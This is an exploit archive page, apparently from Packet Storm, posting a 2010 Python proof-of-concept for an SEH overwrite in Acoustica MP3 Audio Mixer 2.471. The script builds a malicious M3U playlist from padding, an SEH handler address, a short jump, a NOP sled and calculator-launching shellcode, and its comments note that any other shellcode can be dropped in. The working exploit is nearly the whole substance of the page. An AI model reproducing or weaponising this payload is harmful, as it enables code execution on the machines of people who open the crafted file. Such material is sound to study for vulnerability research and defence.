what you don't know can hurt you

Acoustica MP3 Audio Mixer 2.471 SEH Overwrite

Acoustica MP3 Audio Mixer 2.471 SEH Overwrite
Posted Sep 11, 2010
Authored by Carlos Hollmann

Acoustica MP3 Audio Mixer version 2.471 extended M3U directives SEH overwrite exploit.

tags | exploit
SHA-256 | 5f65fda8a52e928e30cb002051bc610a4c6407dffb14c0c14d87a9a5030c7818

Acoustica MP3 Audio Mixer 2.471 SEH Overwrite

Change Mirror Download
# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE :


# ________ _ _________ ____ __ _____ ________
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/

# COLOMBIA presents.............
# PoC from D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
# Carlos Mario Penagos Hollmann A.K.A Elvenking shogilord@gmail.com
# Extended M3U directives

# Background from http://hanna.pyxidis.org/tech/m3u.html



# The software doesn't handle correctly M3U's header and extra info when is being imported on a open sound group.
# Trigger: launch app, open an existing sound group i.e(C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp) then import the crash.m3u and....KaaaaBooom!!
#
#
# Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia
# !!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!




# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.

# Note : you are not allowed to edit/modify this code.
# If you do, I will not be held responsible for any damages this may cause.

#!/usr/bin/python


magic = "crash.m3u"


vuln = "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any value \x1b,\x0a.........


junk = "\x41" * 816
ds_eax = "\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX
morejunk = "\x42" * 8308
nSEH = "\xEB\x06\x90\x90" #short jmp 6 bytes
SEH = "\x3F\x28\xD1\x72"#SEH Handler
nops = "\x90" * 10 #landing padd
shellcode = "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks sud0, any other shell works too just remove "\x00\x0a"
payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode

file = open(magic , 'w')
file.write(payload)
file.close()

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    12 Files
  • 27
    May 27th
    12 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close